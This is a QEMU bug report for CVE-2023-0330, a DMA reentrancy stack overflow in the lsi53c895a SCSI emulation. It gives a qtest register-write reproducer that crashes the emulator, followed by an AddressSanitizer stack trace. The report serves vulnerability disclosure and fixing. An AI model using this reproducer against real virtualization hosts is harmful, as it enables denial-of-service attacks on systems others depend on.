lsi53c895a: DMA reentrancy issue leads to stack overflow (CVE-2023-0330)
Description of problem
See https://bugzilla.redhat.com/show_bug.cgi?id=2160151.
Reproducer
cat << EOF | ./x86_64-softmmu/qemu-system-x86_64 -machine accel=qtest \
-m 512M -machine q35 -nodefaults -device lsi53c810 -device scsi-cd,drive=null0 \
-display none -blockdev driver=null-co,node-name=null0 -qtest stdio
outl 0xcf8 0x80000804 /* PCI Command Register */
outl 0xcfc 0x7 /* Enable accesses */
outl 0xcf8 0x80000814 /* Memory Bar 1 */
outl 0xcfc 0xff100000 /* Set MMIO Address*/
outl 0xcf8 0x80000818 /* Memory Bar 2 */
outl 0xcfc 0xff000000 /* Set RAM Address*/
writel 0xff000000 0xc0000024
writel 0xff000114 0x00000080
writel 0xff00012c 0xff000000
writel 0xff000004 0xff000114
writel 0xff000008 0xff100014
writel 0xff10002f 0x000000ff
EOF
Stack trace
==3850539==ERROR: AddressSanitizer: stack-overflow on address
0x7ffeb10d5e58 (pc 0x55cd154d0f16 bp 0x7ffeb10d6690 sp 0x7ffeb10d5e60 T0)
#0 0x55cd154d0f16 in __asan_memcpy llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
#1 0x55cd15b25676 in sparse_mem_read qemu/hw/mem/sparse-mem.c:50:9
#2 0x55cd16c973cd in memory_region_read_accessor qemu/softmmu/memory.c:440:11
#3 0x55cd16c6e9fa in access_with_adjusted_size qemu/softmmu/memory.c:554:18
#4 0x55cd16c6cf11 in memory_region_dispatch_read1 qemu/softmmu/memory.c
#5 0x55cd16c6cf11 in memory_region_dispatch_read qemu/softmmu/memory.c:1457:9
#6 0x55cd16cb9270 in flatview_read_continue qemu/softmmu/physmem.c:2892:23
#7 0x55cd16cba14f in flatview_read qemu/softmmu/physmem.c:2934:12
#8 0x55cd16cb9ee3 in address_space_read_full qemu/softmmu/physmem.c:2947:18
#9 0x55cd15ed44c5 in dma_memory_rw_relaxed qemu/include/sysemu/dma.h:87:12
#10 0x55cd15ed44c5 in dma_memory_rw qemu/include/sysemu/dma.h:130:12
#11 0x55cd15ed44c5 in pci_dma_rw qemu/include/hw/pci/pci.h:850:12
#12 0x55cd15ed44c5 in pci_dma_read qemu/include/hw/pci/pci.h:869:12
#13 0x55cd15ed44c5 in read_dword qemu/hw/scsi/lsi53c895a.c:472:5
#14 0x55cd15ed44c5 in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1154:12
#15 0x55cd15eed0e5 in lsi_command_complete qemu/hw/scsi/lsi53c895a.c:810:5
#16 0x55cd15e3d5c1 in scsi_req_complete qemu/hw/scsi/scsi-bus.c:1518:5
#17 0x55cd15e41f9c in scsi_unit_attention qemu/hw/scsi/scsi-bus.c:422:5
#18 0x55cd15e33c59 in scsi_req_enqueue qemu/hw/scsi/scsi-bus.c:890:10
#19 0x55cd15ed869c in lsi_do_command qemu/hw/scsi/lsi53c895a.c:869:9
#20 0x55cd15ed869c in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1261:13
#21 0x55cd15ece001 in lsi_reg_writeb qemu/hw/scsi/lsi53c895a.c
#22 0x55cd16c6ef86 in memory_region_write_accessor qemu/softmmu/memory.c:492:5
#23 0x55cd16c6e9fa in access_with_adjusted_size qemu/softmmu/memory.c:554:18
#24 0x55cd16c6e2fa in memory_region_dispatch_write qemu/softmmu/memory.c
#25 0x55cd16cc274c in flatview_write_continue qemu/softmmu/physmem.c:2825:23
#26 0x55cd16cba662 in flatview_write qemu/softmmu/physmem.c:2867:12
#27 0x55cd16cba3f3 in address_space_write qemu/softmmu/physmem.c:2963:18
#28 0x55cd15ed4d5c in lsi_memcpy qemu/hw/scsi/lsi53c895a.c:1104:9
#29 0x55cd15ed4d5c in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1563:13
#30 0x55cd15ece001 in lsi_reg_writeb qemu/hw/scsi/lsi53c895a.c
Edited by Mauro Matteo Cascella